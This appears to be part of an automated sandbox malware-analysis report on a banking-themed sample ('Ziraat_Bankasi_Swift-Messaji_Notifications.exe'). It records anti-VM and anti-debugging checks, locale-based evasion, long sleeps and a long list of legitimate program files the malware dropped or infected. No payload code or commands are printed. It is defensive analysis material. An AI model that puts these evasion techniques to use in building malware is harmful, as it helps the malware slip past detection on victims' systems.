Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 12_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		12_2_009952A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 13_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		13_2_00CD52A0

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\differences\niellist.exe	API/Special instruction interceptor: Address: CEA034
Source: C:\Users\user\AppData\Local\differences\niellist.exe	API/Special instruction interceptor: Address: AFC28C

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 17B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 5210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Memory allocated: 1AEB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 8B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1A610000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1370000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe	Memory allocated: 1B110000 memory reserve \| memory write watch

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

9_2_004019F0

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2993
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6573
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3193
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5865
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3893

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
